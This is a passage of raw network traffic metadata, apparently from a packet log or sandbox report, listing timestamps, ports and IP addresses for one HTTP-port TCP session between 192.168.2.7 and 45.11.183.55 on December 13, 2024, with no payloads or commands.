Dec 13, 2024 18:53:23.715014935 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.715373993 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.715387106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.715428114 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.717084885 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.717097044 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.717132092 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.717842102 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.717854023 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.717895031 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.719363928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.719376087 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.719419956 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.720277071 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.720288992 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.720328093 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.721182108 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.721229076 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.721586943 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.721649885 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.722511053 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.722558975 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.723356009 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.723423958 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.723716974 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.723763943 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.723822117 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.723870039 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.724894047 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.724946022 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.725843906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.725895882 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.726824045 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.726836920 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.726872921 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.727365971 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.727377892 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.727418900 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.728667974 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.728718042 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.857794046 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.857873917 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.858403921 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.858416080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.858427048 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.858449936 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.858477116 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.859652042 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.859666109 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.859709978 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.860816956 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.860862017 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.861058950 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.861104012 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.862128973 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.862140894 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.862183094 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.863171101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.863220930 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.863356113 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.863403082 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.864329100 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.864375114 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.865051985 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.865098000 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.865847111 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.865859032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.865895987 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.867368937 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.867382050 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.867417097 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.868572950 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.868587017 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.868623018 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.869613886 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.869626999 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.869657993 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.869683027 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.870682001 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.870695114 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.870733976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.871715069 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.871727943 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.871759892 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.871783972 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.873284101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.873307943 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.873339891 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.873361111 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.874311924 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.874325037 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.874363899 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.875375986 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.875391006 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.875427961 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.876549959 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.876564980 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.876597881 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.876622915 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.877796888 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.877811909 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.877842903 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.877856016 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.879364967 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.879378080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.879416943 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.880398035 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.880412102 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.880451918 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.880476952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.881395102 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.881407022 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.881447077 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.881458044 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.883373976 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.883385897 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.883424044 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.884462118 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.884474993 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.884511948 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.885843039 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.885854959 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.885891914 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.886189938 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.886202097 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.886239052 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.887367010 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.887378931 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.887413979 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.889683962 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.889695883 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.889703035 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.889749050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.890635014 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.890680075 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.891370058 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.891381025 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.891417027 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.892410040 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.892421961 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.892458916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.893841982 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.893853903 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.893899918 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.895165920 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.895178080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.895215034 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.896395922 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.896406889 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.896444082 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.897022963 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.897068024 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.897123098 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.897166014 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.898200989 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.898246050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.899147034 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.899198055 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.899355888 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.899400949 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.899925947 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.899972916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.901292086 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.901304960 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.901345968 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.902538061 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.902548075 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.902586937 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.903362989 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.903373003 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.903412104 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.904719114 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.904730082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.904767036 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.905747890 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.905760050 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.905797005 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.906718969 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.906730890 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.906766891 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.907893896 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.907928944 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.907937050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.907972097 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.909034967 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.909080982 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.909584999 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.909631968 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.911068916 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.911078930 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.911118984 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.911730051 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.911741972 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.911783934 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.912767887 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.912821054 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.912880898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.912930012 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.913943052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.913984060 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.914273024 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.914314032 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.915050983 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.915095091 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.915321112 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.915364981 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.916410923 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.916420937 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.916457891 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.916467905 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.917465925 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.917514086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.917573929 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.917609930 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.918803930 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.918814898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.918855906 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.919960976 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.920005083 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.920659065 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.920713902 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.921372890 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.921421051 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.050309896 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.050390005 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.050606966 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.050659895 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.050957918 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.051014900 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.051043987 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.051090002 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.052067995 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.052117109 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.052206993 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.052257061 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.053275108 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.053320885 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.053338051 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.053381920 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.054567099 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.054615974 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.054815054 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.054864883 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.055669069 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.055722952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.056344986 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.056391001 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.057415009 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.057426929 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.057465076 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.058482885 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.058495045 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.058532953 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.059370995 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.059382915 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.059418917 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.060554981 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.060574055 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.060602903 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.060626984 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.061691046 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.061774969 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.061851978 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.061899900 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.062896967 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.062947035 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.063240051 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.063290119 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.065299034 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.065310001 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.065320969 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.065351963 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.065377951 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.065380096 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.065421104 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.066567898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.066617966 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.067327976 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.067377090 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.068212032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.068224907 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.068255901 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.068272114 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.068912029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.068952084 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.069031000 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.069076061 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.071402073 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.071413994 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.071423054 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.071460009 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.071470976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.071494102 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.071543932 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.072981119 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.072992086 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.073036909 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.074563026 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.074578047 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.074620008 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.075131893 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.075145006 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.075186014 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.077434063 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.077446938 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.077457905 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.077486992 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.077498913 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.077572107 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.077625036 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.078950882 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.078968048 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.079004049 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.079018116 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.079884052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.079895973 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.079926014 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.079943895 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.081406116 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.081418037 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.081456900 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.083282948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.083296061 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.083367109 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.083384037 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.083425045 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.083865881 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.083915949 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.085376024 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.085388899 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.085418940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.085429907 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.085833073 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.085879087 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.087109089 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.087120056 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.087131023 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.087161064 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.087183952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.089286089 CET	80	49847	45.11.183.55	192.168.2.7
